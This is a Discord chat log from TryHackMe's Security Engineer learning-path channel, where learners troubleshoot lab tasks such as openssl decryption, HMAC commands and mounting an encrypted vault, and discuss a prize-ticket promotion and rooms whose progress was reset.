#security-engineer-path

⚔️

lets get it going!

hell yea!

This will be fun once I get off of work

How do you claim a prize with the 3 tickets of 1 thing?

Go to tickets and click on claim

I don't see a claim anywhere in my tickets thing but I have 3 of 1

!docs verify

@strange pasture link your THM account with discord so you can post screenshots

Also

Re-updated

Gotcha, its cause I got the Amazon one

Congrats!

I am really liking the Identity and Access Management room, nice review from some Security+ content that I have kind of forgotten about over time

You have 30 seconds per question
Me, trapped underneath two cats, unable to reach the mouse 😆

It's almost identical to a lot of the stuff learned for the Certified in Cybersecurity certificate through ISC2 as well

can someone help me with this? I can't find IaaS filter anywhere

Nvm. Found it

Hi, Found a bug on the lab on the first section. All questions were coming back wrong, went on private mode and the lab worked fine. I'm on Edge (Dont judge 🙃 )

I have prob with this question:
What utility was used in the oldest event associated with "James"?

is there an issue? because no of utilities is work

did you find it?

Im looking for 1 hour

maybe more

No

Not yet

waste of time brother

nobody can get third ticket

In the room Intro to Cryptopgraphy task 05 , cannot get the cmd sha256hmac to work on my VM or on the Attackbox, anyone know a work around?

use hmac256 as mentioned in the task, in the screenshot as you can see the resulting hash is the same

thanks, that worked. I had to download the repo "libgcrypt20-dev" as well and it worked

Introduction to DevSecOps task 7, the site just seems entirely broken for me? it's stuck on "next (5)" with the button grayed out even when I complete the question for the first comic

completed the questions for all 3 comics based on the little description of each in the task description, but ofc can't get the flag at all now

nothing is seemingly progressing the comics pages

there are some hints in #1150825549191725179

hello, does finishing the path mean that u get all the tickets?

no

it is random which tickets you get

😦

i got 2 laptop tickets

At least you can finish it lol. I don't think there's enough for free users to even get one of the basic prizes lmao

Only 12 out of 31 rooms are for free users including 1 welcome room. 😓

im pretty sure its rigged somehow, another user posted in general that she is finished and the tickets had a similar pattern

you get two high value tickets maybe to encourage those who have free accoutns to buy sub

its highly unlikely that is random

It's a wonderful guesstimate, but that is not how the system rewards tickets. 😄

eh it's normally how things like this go tbh

mcdonald's monopoly system runs the same way. like 1 of each high value group is insanely rare compared to the other ones in the same group to make it feel like you're "so close" to getting it so you buy more

its too obvious to claim that it isn't that way

Who gives a f...rog about tickets, its about the learning process 🙄

Can't really do much of that if you're free lol

all the new users that are going to sign up and get subscriptions, and those who profit from it

But you also profit from it anyways, due to more interesting and useful content.

at the end of the day i dont care i like pointing unethical business practices

I don't think promotions are considered "unethical business practices" it is just good marketing and a fun event to take part in

"When you complete a room and draw a ticket, it's randomly chosen based on the prize's rarity rating."

they lied, give me an argument to defend lying ok go

I'm going to ask you to stop making wild claims and flood this channel.

Uhm.. you can choose not to participate in it? Also, you only gain tickets which still needs to be drawn? What's unethical about it?

In any legal system, the burden of proof always lies with the accuser.

Hi 👋

NVM, I just saw #1150836424426393600 channel

Can someone explain the reasoning for the answers for the "Walking in Their Shoes" section of the "Security Engineer Intro"? I tried asking a couple security engineers what their answers would be since the correct answers didn't make sense to me, and they also answered differently to what the thing wanted so I have no clue what the reasoning is

i think its about minimizing the risk first .So the answers should be related to that

How much of this room is comprised of new content as opposed to content that’s just already been created and put into the path?

The security engineer path room is it free or I need to subscribe before accessing the room?.

In risk management room asset value is set to 0 . is this intended ?

.

Didn't notice this when I did the room. I simply focused on the loss value and cost of safeguard.

i think it's because the door itself is being counted as not worth anything, it's what's behind the door that has value? but doors do cost money to replace

What utility was used in the oldest event associated with "James"?
stuck on this

i got the event but dont know what utility they mean

shouldn't this be a question? (windows hardening)

anyone?

The Asset value should read 20,000. I will check why this bug has not been fixed. Thanks for reporting.

Gave +1 Rep to @hollow fern

found it

WMIC

The learning path consists of rooms that have never been released as part of another learning path. We release rooms weekly that make up a path though, so you might have already seen/completed individual rooms prior to the release of the whole path. 🙂

Each person can only get one prize Win Prizes and Learn - 2023!, or how many?

yes

Did you find what question is about ? I cant find nothib about it. Maybe I dont understand question 😭

these little minigames that restart on wrong answers are dismal

mhm, im stuck on the zone-transfer game .. last task in the whole path .. gimme a real config and i make it work xD

agreed, the zone transfer game is brutal

does anyone know why the 'hmac256' command works in the attackbox but not on parrotos? am I missing a library?

Does the tickets thing actually work? On the main page no one claimed anything, that's pretty sus

The statistics in the room task are not updated automatically. 🙂

Why? WHen are they updated then? I'd like to know what I can still get -_-

claim on demand!

Through out the entire event, at any time, you have the same chance to win any prize. 🙂

same chance to win any prize ? Surely the laptop ir harder to get right? Shouldn't I be able to see If all laptops are already claimed? Sorry I'm not fully understanding 😆

You have the same chance to win a laptop now as you will have on the last day of the event. 🙂 Hope that makes it more clear.

How can I win tickets? I'm already doing everything possible

I even sent an email about my blog post yesterday, but they didn't respond.

Hmmm ok thanks

Gave +1 Rep to @latent wind

I think I know what you're talking about, you're on this https://tryhackme.com/room/tickets4 right? you need to finish all 7 tasks on that room to get the free ticket

the video and blogpost are manual, could take a few more days

okay

Reaching the end here slowly, really liked 90% of the info in the path. Nice release.

Hi guys, I've been stuck trying to understand how to proceed with this code: (HINT) sudo cryptsetup open --type luks secretvault.img myvault && sudo mount /dev/mapper/myvault myvault/ BUT I wrote: sudo cryptsetup open --type luks secretvault.img myvault && sudo mount dev/mapper/home/tryhackme/secretvault.img myvault/
and it doesn't even works 😢 "Device secretvault.img doesn't exist or access denied." not sure if is a bug or im doing this wrong

/ missing infront of your def?

also try to put code and things in `here`

maybe, let me try that now 🙂

Hi, is someone know what they mean by saying "utility" ? There is nothing linked to Splunk called "utility", I don't really know what I'm supposed searching...

Room : Logging for Accountability

the code comment was for discord

ik 🙂

just making sure :D

Yeah, that was a hard one for me yesterday but I figured it out. Let me verify my notes...hold on

you have to find the windows version of the command-line that appears in splunk

Oh ok, thanks, I check this out

Gave +1 Rep to @last narwhal

Just check your dm 🙂

any understands task 5 in Secure Network Architecture?

I'm in track 3 of Linux Systems Hardening, how can I switch from root@attackbox#to user@TryHackMe$?

nvm got it lol

@latent wind The statistics about the awards claimed disappeared , did you have something to do with this? 😂 just curious if you guys actually listen to feedback here on discord and change things accordingly this fast or it was just timing

any one else having issues with the kubernetes task on the Virtualization and Containers one? It's like it's not spinning up correctly after I click the start machine. I can login to the machine just fine, but running the suggested commands in the hints give errors. I've also given it 10-15 min (much more than the suggested 3-5)

Unable to connect to the server: dial tcp 192.168.49.2:8443: connect: no route to host

not sure if anyone has had an issue with this, but i seemed to have fixed it by installing libgcrypt 🙂

Should still be there in Task 1?

Before it said 0/250 claimed and not it says 250 available, at least for me

Same

I see now, you're right. This will change to claimed information on the first update.

Lets Gooo!! 🥳 🥳 🥳

Shnorhavor 😅

mersi))

I'm at the ISO/IEC 19249, under encapsulation, don't they mean functional programming here, not OOP? I could be wrong, just checking my understanding of functional programming vs OOP

"Encapsulation: In object-oriented programming (OOP), we hide low-level implementations and prevent direct manipulation of the data in an object by providing specific methods for that purpose. For example, if you have a clock object, you would provide a method increment() instead of giving the user direct access to the seconds variable."

Finished the path, got the security warrior and both streak freeze prizes. Got 2/3 on all of the rest.
Anyone got anything besides this ones? Just wondering 🤔

yes, i am got 5$ swag vaucher and 1 month premium

Nice, unlucky me i guess

Profile > public profile > tickets

I'd like to know how we can get the tickets for rooms that were already completed prior to this path being set up...

just reset progress and fill answers from begining

can you DM me regarding that same question as well?

sure

I can't do this challenge at all, the site always keeps closing for me, I've tried changing PC, browser, everything but it doesn't work

is the Putting It All Together of risk management

Does anyone have a writeup or would it be possible to send me the flag?

maybe you got a virus lol, because that's not a thing a sandboxed application can do.

these are walkthrough rooms, if you're not inclined to learn, you're at the wrong place

idk

I am, can you show me your screen and I'll tell you what?

what do you want me to show you??

I am stuck at the same question , checked the windows version but can't figure out how it's supposed to be with 4 letters xD

I just sent you a DM

just finished it

hey guys
i am on this new security engineer path and when i finished one of the walkthrougs, a window poped up to give me 2 tickets but i closed it before redeeming them, how can i show that window again?

you can see your tickets in "public profile" area

where you can look at badges

yes but I cant find the last 2 I won

they'll show up in the tickets area. AFAIK you cant view which specific two you got from the room

No I didnt get 2 At all

i had 4 before completing and they are still 4

looks like I had to reset progress haha

and it worked

This should be in #1150836424426393600
I will post it there

ty ty it worked

Welp, I'm calling it a night with 7 rooms left, hoping to finish it up tomorrow, learned a ton so far though

Guys, can I redeem as many prizes as I want?

Yeah, but getting them is random
Check #1150836424426393600

it will be ok to start Sec Engineer im rn doing JR pen , or ill not be able to finish it ?
any recommendations on which foundation should i imporve my self ?

For the question "
Open the Diagnosis folder and go through the various log files. Can you find the flag?"
in Task 2 of Microsoft Windows Hardening, I have located the file "flag.txt.txt", but when I try to manually open the file, it gives the error included in the link below (it's a screenshot of the error).

(https://cdn.discordapp.com/attachments/1009347347387515001/1151494928896118875/Screenshot_2023-09-13_152906.png)

EDIT : Fixed by moving the file to desktop.

need help having this error: on Task 2 of Introduction to Cryptography

was there an error in the command, what you entered before?

^

there are no errors just keep receiving "bad decrypt" when using openssl to decrypt

The only thing I cannot complete is task 6 Threat Modelling, not sure what to do.I have 99% of the course and I cannot go further because of this simple task I cannot complete....🥹

got it now...it works when using the attackbox, anyways thanks for trying to help 🙂

Gave +1 Rep to @dark rock

Check the #1150825549191725179 hopefully you fill find hints

I finished all the rooms in the new path, but I still couldn't get a ticket for any prize, and now, how can I still have a chance of winning something?

I brought a premium sub after going through some rooms on the sec eng path, as I did the rooms can I still avail the tickets being a subscriber?

According to the faq once you have claimed ticket in any room as normal user you cannot get the perks of being a premium user on that room

So if you claimed one ticket you won't get another ticket but if you completed the room before the path launched and haven't claimed ticket you can reset the room and claim tickets

I have a voucher for THM baseball cap. If someone buys a 1 month premium voucher for me. I would love to exchange baseball cap voucher for one month premium voucher 🙏🏼

Dm if interested

Room: cryptography
Task 2

my code:
openssl aes-256-cbc -pbkdf2 -iter 10000 -d -in quote02 -out q2.txt

but get the error,

digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:

i entered the key as shown

should i just return after this contest? the platform is very busy so i assume help will be available then

shouldn't the discoverability chart in task5 of the threat modelling room be the other way around?

as of know being harder to detect lowers the overall score

no wait, i misunderstood the meaning of it

i mistook the intention to be defender tools like malware scans and not vuln scans

i'll leave the comment in case someone else makes the same mistake

for the room: Identity and Access Management
Task 4, near the bottom (above the answers) the line reads as follows:

In iterate, 2FA requires two authentication mechanisms, and it falls under the more general MFA, which requires two or more authentication factors. This requirement can significantly improve security and protect against various attacks, such as those that take advantage of weak passwords.

Should it not be: To reiterate instead?

take off the pbk and iterations, should work

thank you ❤️ , it worked

Gave +1 Rep to @rose otter

openssl aes-256-cbc -d -in quote02 -out q2.txt opens quote02 file ✅

prizes gone?

I wouldn't think so

Governance & Regulation
Task 6
Under the sub-section: Developing and Implementing NIST 800-53 based Information Security Program

There should be an s after control:
Among all the families, "Program Management" is one of the crucial control of the NIST 800-53 framework.

I'm having trouble doing the symmetric key problems. I am using the Attack Box but either get a "bad decrypt" error or a "deprecated key derivation" error. I tried updating the packages and it still isn't working.

enter aes-256-cbc decryption password:
bad decrypt
140038737277376:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:
root@:~/Rooms/cryptographyintro/task02# openssl aes-256-cbc -d -in quote02 -out quote.txt
enter aes-256-cbc decryption password:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.```

Go and open your file that's just an informational warning.

Wow

Thanks a bunch. I can't believe I didn't just try opening it anyway

I did the same yesterday 😩

Haha at least I'm not the only one!

Hi everyone.
In the Linux Hardening room we have this question.

We cannot attach external storage to the VM, so we have created a /home/tryhackme/secretvault.img file instead. It is encrypted with the password 2N9EdZYNkszEE3Ad. To access it, you need to open it using cryptsetup and then mount it to an empty directory, such as myvault. What is the flag in the secret vault?

But there are no any /tryhackme/secretvault.img file in attached VM

did you ssh?

no. I'm just running an attack Box

Is this path for free subscribers also?

I was going through the path and every room was available up until now when I reached Identitiy and Access management...

yeah same it was free i completed half and now its paid:(

They must have altered some settings. It doesn't make sense to change it in the middle of your learning process

they should have it as free until the event is over atleast

I thought that was the case, but something happened I think, because I was in the middle of a room that I could access and a few minutes later I couldn't answer a question anymore...

I am opening a support ticket... 🙂

dont think they are gonna make it free now tho

you need to ssh from the attack box is what he is trying to say

Thank you. I've already done

Gave +1 Rep to @outer wing

gotcha! No problem

Dam it's gone subscriber only for most of the rooms it seems, the promo made it seem like it was for both free tier and subscriber, but you get more prize entries as a subscriber?

yes

I guess that's that then 😞

Anyone encountered this when attempting Task 6 of Network Device Hardening room? It takes forever for the OpenWrt Firewall Status page to load...

yeah, it took some time for myself aswell, i had time to make coffee meanwhile 🤓

Did anyone receive rare tickets?

did anyone receive any rare tickets? (all three)

bruh

I am also stuck on linux hardening. I will try ssh'ing from the attack box.

Also for the rare tickets. I have recieve 2/3 for laptop. That would be sick if i land that 3rd one, but for now i am assuming its like mcdonalds monopoly and that last piece is impossible haha

yeah, there is only 4 laptops so gl

I wonder if they're still there

man, I'm a security warrior, do me blue 😭

You can force the bot to give you the color by verifying again

-f

Wait no one has won laptops so far ?

I have 2/3 ticket for laptop

I think one guy did

did u get the original text?

Yes I did

🤙

Hi everyone.
Can you please help me, cause I'm stuck here
In the Linux Hardening section we have Firewall topic and there are a question like this.

What is the allowed UDP port?
I try to do UDP scan but it doesn't work

for Governance and Regulation - task 8 exercise the timer doesn't start if you do the tutorial

for Threat Modelling, task 6 and task 7 exercises timers start immediately, I think they should start after the user clicks continue

is there an update on claimed prizes?

Not yet. 😄

My completed rooms in this path reseted themselves randomly

getting a bit lost on the task2 of the cryptography room. any hints por favor?

tried adding the cipher algo to see if that wouldve worked by specifying it

So I finished Managing Incidents and Network and System Security few days ago and I just noticed some of those progress have been deleted 😮

Same, which ones you got reseted?

the crazy thing is...i still have the badges from those they reseted lol

Same as. Everything I did this week has been reset, and at the end says 'tickets already awarded'

up

dang wth

oh it doesnt give tickets again? then im not doing it hah

Same here. Everything I did this week has been reset,…

A fictional CVE became real.

https://nvd.nist.gov/vuln/detail/CVE-2023-2022
😃

some of my room got resetted. One of them i really hated now i need to do it again

edit: only 1 room got reset. another is new addition in this path IG. (Traverse)

lo

twice now Secure Network Architecture has reset to not completed fyi

Same here, all managing incidents was reset for me.

Same, Secure Network Architecture has reset for me as well

Remove the output, cipher, and passphrase. Then ull be prompted for the passphrase and it'll output what you need after you supply it

Hello, do you mind to DM me your profile name on the site?

All of our secure networks architecture and all managing incidents were reset for a lot of us.... a lot.

Same here.

I had completed the whole "Managing Incidents" block and now it shows as completed untouched and incomplete. Not glad this happened to you all too, but selfishly I am glad it seems to not just be affecting me

@latent wind here my profile, I have those badges already and got the tickets but...it magically outta nowhere those room disappeared lol https://tryhackme.com/p/tanyaleedev

Once is bad twice is brutal, F to pay respects.

Has anyone else here had them reset twice? Until it's solved, I'm apprehensive to keep going on other modules because of these random resets

it's a waste of time and money tbh

I get how frustrating things like this can be, but I like THM. Not to sound like an ad but I find it the best way for me to learn (I have bad ADHD) and for as much content there is think the monthly fee is well worth it to me. While I like the platform a lot I can definitely see how other folks can feel differently though

-f

I'm doing the Windows Hardening Task 6 and stuck trying to figure out how many characters does the Bitlocker recovery key have in the attached VM question. I've got the character number for the key in the text file but it says it's wrong. What am I missing?

@hot tinsel I beleive the Bitlocker recovery keys have a standard length, looking at Microsoft support docs for Bitlocker would point you in the right direction

hi all

I think most people are receiving these, right?

I have only finished 6% of the course.

😅 SUS

Does someone finish the room cryptographyintro ? I had a problem with one question and I am wondering if it’s not a problem from TryHackMe itself. I am pretty sure about the answer but it doesn’t work !!!

Hello please help

Task 4 question 2 : the prime number’s last byte

Did someone finish this room to confirm me that everything’s is correct.

@hollow crest

haha It told me I have to finish the pre-security first.....

yes, I finished the room. everything is fine.

I can help you with a hint if you like

yes, you have. however It's not necessary if you have any background knowledge.

Yes please then.

I dis the first question. And it’s exactly similar to what I did for the previous question. I don’t know why here it doesn’t work.

simply you need to run the command in the example and answer with the last byte as in the screenshot.

of course you need to read the correct filename in the question

Mine did too

good suggestion, did some digging and found the answer. Thanks!

Gave +1 Rep to @sage orchid

Why is the tickets so bad

Like I have gotten the same 2 tickets Ive redeemed for like 8+ rooms

there are thousands of people who are participating, your chances of winning big prizes are slim but still there

Every example in thm is in ubuntu user but when I ssh into my machine it's only tryhackme user and I can't switch ubuntu user thus I don't have sudo as well .

Any help

Which room are you doing?

https://tryhackme.com/room/linuxfundamentalspart3#

I'm experienced with linux btw

If you SSH'd in, your in the correct user.

Yeah but examples are in sudo user and it wants me to check the /var/log and I can't do it with tryhackme user

oh wait sorry

1 file is owned by my user

You can, you're checking the wrong log.

Yeah you are right nvm

one of the files are owned by my user didn't realize that damn looking at it for 15 mins 😄

Yea

the sha256hmac is still not working in Cryptography Intro room task 5. Can only use the hmac256 method

windows hardening room

🤨

wait you are telling shadow you don't game with flash player games???

they don't work on my netscape communicator 😦

(not even sure if that's true)

I am having a heck of a time with the second task - I keep getting this (both on the tryhackmebox and my own computer), but the command to use doesn't have a place to put a key. Tried a bunch of other things, like cyber chef, but it says the hex code version of the key isn't long enough

figured it out.

Thank you TryHackMe for this learning path 😁😁😁💙💙💙

I love it, some of my favorites are the app Sec rooms, Dev and Secure Coding, and Threat Modelling.... but the entire path is legit 💪💪💪💪

Keep up the awesome work and producing wonderful content, looking forward to what else y'all release

Logged in this morning to discover 5 rooms that i completed with reset progress... dafuq

Same my "Secure Network Architecture" and whole module Managing incidents was reset, fixed some of them but i do not get the tickets so will wait to see if it fixes itself, i do not like to not have 100% completion 🙂

does any one have clue for quote02

task 02

stuck at openssl

openssl aes-256-cbc -d -in quote02 -out q2.txt -iter 10000
enter aes-256-cbc decryption password:
bad decrypt
139936534548928:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:

can any one help what was wrong in it

try it without iter

I experienced a similar issue. Don't recall the exact fix (because I didn't take notes ).
Try messing with the syntax. Use a different variation of similar/equivalent options.

I surfed the web a bit and referenced the man pages; was able to successfully decrypt without much trouble.

Are you missing -pbkdf2 param?

Well I finished the Path

it was pretty cool

too bad i didnt get any prizes

cleared

any one know mother's secret hints

finished all except this room

but haven't got any vocher

even if I finish this will get 2 so nothing I get even steaks

Is that the one where you're guessing the security questions?

didn't understand

guessing means

it accepts right answers only right

if you're talking about the same room, you need to guess the answer to the security question to reset the password

so pick the question with limited answers

lol i'm enjoying this path, it's funny everyone complains about not winning the prizes though. That's not really the point of it

why does my jwt cookie not work in the Cookies4all app? It decodes properly from what I can tell.

need to encode the two parts separately then put a period between them

ohhh. I added a period in based on where the cursor was in cyberchef lol. it looked like it was decoding properly.

hope that helps!

no dice idk where i'm going wrong here.

got it

I think it was moreso an issue with hasty copy/pasting from AttackBox clipboard

thanks @wise mulch !

Gave +1 Rep to @wise mulch

that was the hardest part of the whole challenge 😅 repeatedly have to remind myself to slow down and think.

yea, i do the copy/paste mishap a lot lol

it's a rush to get any sort of flag that is slightly difficult lol. idk if it's the adhd or what.

I don’t have any rooms left now to get more tickets

Did you write the blog post already? And maybe do the YouTube video thing?

I still have 9 rooms left and I'm powering through

Write blog, no YouTube video

Did you submit it to THM to get your free flags already?

Submitted but haven’t received

@latent wind maybe you can help/check on this for this person?

Sent msg

Guys, i had 2 rooms that reset on their own, did it happen to anyone else ?

I had already finished them

The secure network architecture and logging for accountability rooms

Same here

The Link to the Coso Framework in the auditing room leads to a 404

Can you link the room and post in #room-bugs thanks.

Gave +1 Rep to @broken crescent

Anyone else have the Secure Network Architecture room reset on them?

Oh, i just saw above someone mention it as well.

wow, finally I have completed Security Energy learning path 🔥

I am in the LinuxSystemHardening room. There is supposed to be a file called /home/tryhackme/secretvault.img. It's not there.

I think I had a similar issue, it's in a different directory i think

I don't think it's anywhere.

I also tried some of the later tasks in that room and it seems like I have the wrong VM.

I am using the attackbox. Should I be doing something else?

Yeah!

did you ssh into the vm?

I can't. I can't find the password for it.

it's in the intro

you can ssh into it from AttackBox or the VPN

Thanks!

Gave +1 Rep to @bright gulch

glad to help!

Lol Authorisation-Token threw me off. It had to be Authorization-Token

Has anyone completed the LP?

quite a few people

Same... this drove me nuts for a while

the ship is too fast lmao I can't read the options

Did other people also experience that some Rooms got reset in this LP?

Not yet

huh wierd

My burp suite module got reset though

yeah i know that happens sometimes when the rework a question or change something in the room and you have to reawnser the (new) question, but this is the first time that the complete rooms were reset which is rather annoying

like 4 rooms got reset for me

Burp module was updated.

I assumed as much, but I've seen people claiming their room progress has been reset, so thanks for clarifying

Gave +1 Rep to @fair orchid

So did the Secure Network Architecture room get updated too? That is the one that seems to be resetting and I haven't seen anyone acknowledge why lol

Is it only me or is the diffie-hellman part of https://tryhackme.com/room/cryptographyintro kinda wrong?

"Although an eavesdropper has learned the values of q, g, A, and B, they won’t be able to calculate the secret key that Alice and Bob have exchanged.", it's not exactly wrong but an attacker in the middle could make a connection to both alice and bob and they wouldn't know, DH needs some sort of certificate like in https to really be secure

I guess they're only considering a situation where someone can read the date being transmitted, in that case it would be safe and it does make it easier to understand

nvm, just got to the end of it and it literally mentions what I just said

should've read it until the end before saying something

that whole cryptography room was way too detailed where it tried to break down how each method worked with analogy

just super confusing scenarios they wanted you to try and follow with variables lol

the point of "walking the dog" when teaching is to make something easier to understand and i got more confused the more i read haha

how do we get security warrior role

Just gotta get 3 of the security warrior tickets

oh i gotta finish the whole course?

I ain't got premium so maybe I can't even if I wanted to

its random, you'll probably get it pretty early tho

oh gotcha thanks

Gave +1 Rep to @sour ivy

I suppose role is gonna delete anyways so just gonna go for some prizes

It will.

any one has won any prize so far ?? I am getting the same tickets over and over

i thought prizes weren't announced till the end

you can check your tickets so you know when you can claimed them ...

You can go to your public profile and then click on the tab 'Ticket' there you will se what you have won so far

I believe that shows you what you have tickets for, not necessarily that you won. (edit: depends on the item)

For the laptop, if you get 3 tickets, I think you are entered and possibly win a laptop.

Most of the prizes you can claim automatically. However, email us at tickets@tryhackme.com if you've won the Amazon Voucher, Laptop, or certification voucher. Make sure to include your TryHackMe username in the email, and use the prize name in the email title (for example, if you win an Amazon Voucher, include "Amazon Voucher" in the email title). As some of the larger prizes and entries are manual, we will get back to you by mid-October to verify.

ok cool

thanks

fyi, i've completed several of the rooms in this path and had the redeem ticket pop up. Instead of clicking on the ticket itself I clicked on the "View" button directly under the ticket and the pop up dissapears and I never got them 😦 big sad. Thats happened to me twice because I fat fingered it

If I'm not finding an answer where I think there should be one, am I allowed to ask for help or does that defeat the purpose of the room?

lol ive had tickets disappear overnight

I have no clue what I'm doing wrong but the result of a command in the Intro to Cryptography" room (Diffie Hellmen task) is giving errors.

i think openssl take parameters/arguments with 2 dashes if i recall correctly

Thanks

sorry, thats not the case but i ran into this post mby it helps you out https://stackoverflow.com/questions/18460035/unable-to-load-private-key-pem-routinespem-read-biono-start-linepem-lib-c6

who's winning what

I am stuck on Mothers Secret any hints? Been using postman to try to hit the API routes but I'm not sure what i'm missing

have u looked at files/hints?

yeah this one has me feeling dumb. i see three routes

i'll keep working on it

attackbox died in the middle of it ugh

Anyone figure out the last Going the Extra Mile challenge in the OWASP room? It's a bonus with no flag. Question: ||There's a way to use SSRF to gain access to the site's admin area. Can you find it? ||

oooh server side request forgery

I feel like it should be pretty straightforward but no luck yet

i got it lol except for the last question, the content of the file

oh nevermind

that was fun

never fails, asking for help is my rubber duck! gonna take a break and then finish off the IR rooms and I'm done with the pathway. Oh, i'll have to go back and redo the Secure Network Architecture but I'm saving that for last lol

woohoo, just finished this path 😄

woo, finished too

@woeful verge congrats

thanks you too!

Intro to Cloud Security module doesn't feel as well written as the previous modules

Hello everyone!
Today i noticed that i lost a few tickets related to this path! Did this happen to anyone else?

I'm on the Intro to Cryptography room and apparently I have to downoad hmac or something? Does anyone know how I can do that? I tried with sudo apt-get but it says it's missing files and doesn't work.

have you tried to run apt update && apt upgrade and then rerunning the apt install command???

not yet. I'll do that. Thank you for responding

it said some index files were ignored or old ones used instead

if it's saying the repo isn't updated, is that something I can take action on or am i just stuck here?

Also apparently sha256hmac doesn't exist? It's not even saying "you can get it here if you download this" like it did with the first one.

Don't download that just run
openssl dgst -sha256 -hmac ----------

^ I was looking for that exact command.

so it'd be ||openssl dgst -sha256 -hmac order.txt and then the key?||

Got u bro 😂

Yepp u got it ...

We are here... try and come back to let me know

IT WORKED

Thank you so much!

Happy to help

How do you guys like the path so far? Does it also teach you how to deploy apps and maintain them etc?

also wondering how you guys are liking the path. I am currently doing jr pentester path

I'm only 60% through it, but its got some severe issues with polish. Minor things like misspellings, but also several questions where I've had to give up and check the forums only to find that the reason I'm not getting something right is because the lesson itself is wrong (ie. A view site problem expecting an obviously wrong answer). It also is very heavy in what I'll call "white collar speak" and if it weren't for my experience as a software engineer I'm confident I wouldn't understand a lot of it and worse, would misunderstand and think I understand (ie. Terminology such as "stakeholders").

There's also been a few times I've consulted security engineers I know over segments I didn't quite understand the rationale about and they were very opinionated against the content, but their ramblings went over my head so I don't remember them.

I'm new to tryhackme overall and I am overall impressed with the platform, but I probably would have waited to continue with this path if I weren't being bribed with the ticket system.

As for deploying apps, based on the titles of the rooms I haven't completed yet I'll say no. Deploying/maintaining is more devops-y than security engineer imo, but tech titles have vague borders especially with tech companies trying to squeeze more responsibilities into their workers, so emphasis on it being just my opinion.

Any updates on what prizes are left?

You can still get the tickets

That's not really answering the question above.

I don't think THM have released one.

There are still all prizes left

It's a giveaway and you can only participate if you have the 3 tickets

The giveaway will occur when the event ends

No it won't?

It won't be until mid October.

Staff will need to verify prize winners.

I’ve been in security a few years, should have been more specific.

Deploying and maintaining security apps/platforms is what I mean. Our security engineer usually sets up and maintains them etc.

Title’s definitely have varying responsibilities I agree

Anyway, the point is that there are still all prizes left

You don't know that though :/

When the red teamer event was here, it was updated daily, if not every few days, and it was E-mail FCFS basis.

I can't read fast enough for this secure space lifecycle 😄

https://tenor.com/view/mad-pissed-off-anger-angry-fist-gif-17698178

Managed it 😂

man that one had me raging lol

I'm suck on the Splunk section -- https://tryhackme.com/room/loggingforaccountability

When I load my Splunk instance it's "suppose" to have a dataset already loaded but when I look at the instance it appears to be empty. I can import / add a new dataset but that's wrong. Any suggestions? I'm also in the Splunk Basics room but it's not helping me figure out if a dataset it loaded / how to read

Oh they have segments on using the platforms but they've already deployed the apps on their VMs. So maintaining yes, deploying no

It's not in-depth with any of these platforms, more of a way to get you more aware of them, but if entry level security engineer expectations are anything like entry level software engineer requirements I suspect that's fine

yea, I got stuck on that room for a bit, but clicking Data Summary showed me the dataset to answer the questions

I'm loving the DAST room. ZAP's integrated browser is a nice touch that wasn't a thing the last time I played around with web proxies

Or I had no idea it was a feature

Thank you, that was what I needed to get the info and finish the module!

Gave +1 Rep to @muted bane

has anyone had issues with not receiving tickets after completing rooms?

ugh the crypto room is super long

are the tickets given at random or certain rooms give certain tickets?

It is completely random

Hey there! Just checking if anyone has** not** had their progress reset in the managing incidents module?

Mine was last week? I just re done it.

Thanks, just trying to scope how many users have been affected

Gave +1 Rep to @fair orchid

For the IR room Splunk it asks how many incidents for James but expects a single number… I’m seeing a double digit figure

It is a single digit number, what are you searching to get your double digit result?

• AccountName=James

Try User="Cybertees\James", or you can just click on the users on the left side and click his name

Anyone do the Incident Lifecycle Game first go?

I might never get it 😄

You'll get it, just keep trying. I ended up making a notebook with each correct answer as I went along lol

I’ve taken a break, but might have to do the same 😂

VICTORY, got my certificate 😄

Folks, feeling foolish here - in the Governance & Regulation room - under task 6. The last two questions are stumping me. "Per NIST 800-53, in which control category does the incident response lie?" that appears self-evident to me - but the answer seems to not accept the actual control family it is in. The next one "Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?" has me driven demented... Any pointers would be greatly appreciated

look carefully on the pictures in said task

as the pictures layout the answers to that task

thanks @heady echo - I'll try that again - as reading the NIST documentation is not helping me...

Gave +1 Rep to @heady echo

yeah the documentation is not gonna help you answer said questions at all

which was really confusing for shadow but eh you learn

one done... now the last one

done - that took way too long - thanks again @heady echo for the very helpful nudge

you're welcome

No t-shirt for me, enjoyed it though 🙂

Nearly there 🙂

Yep. Not gonna lie guys, kinda underwhelming material.

yeah me too! 😦

My progress was reset for the Network Device Hardening room twice! I am just not feeling like re-doing it it for the third time now..

guys, in linux system hardening there is no file in task3 called secretvault.img...am i supposed to create one?

nvm i am an idiot

Has anyone scored any SWAG yet? 🙂

just finished the path. It was a lot of fun. I came close to winning some big tickets, had a bunch of items where I was just waiting for the last ticket

Hello

,in this room I get an error in pods "Virtualization and Containers"

This is error message "E0923 16:03:37.820772 1601 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dial tcp 192.168.49.2:8443: connect: no route to host" @uncut crest

YAY for not tagging everyone.

what is YAY?

It's a celebration

Do I have to wait or report? @fair orchid

I'm about 75% finished and have Security Warrior, & both Streak Freezes. Hoping for a sweet THM Hat 🎩

i just claimed the 1-day streak freeze and then the 7-day streak freeze.. it now says i have the 7-day streak freeze equipped.. should i have waited until i was ready to use them to redeem them?

Yes, they don't stack.

I've deployed the Window's hardening box but I can't connect to it? I've restarted the box, checked connection, tried rdp, ping, ssh not sure what the issue is

are we able to claim multiple prizes?

Yes

Just had the same issue by the end of a room. Must be on the THM side

Can anyone help me understand how to obtain the DAST ZAP final answer? I can't seem to get it for the life of me.

Never mind. I got it.

Just finished the path... feeling great 😎

Did you find it? I can't! I even ran a find and I couldn't find anything!

i feel like they should stack tho.. i earned the prizes and should be able to utilize them when needed..

There is, I found it but can't remember exactly how now. I remember it needed you to decrypt and mount or something like that

I probably have hours left for my premium to end and I just need 1 more ticket for the monthly premium voucher, praying thm gods....

If you are still stuck there is hint in that task and in that hind you'll find 2 command to run so run them you'll get the results and that's all you need to do

Run the commands mentioned in the task hint

if theres only 3 laptops to be given with the last event why am i still getting laptop tickets?

Welcoe to the world of random.

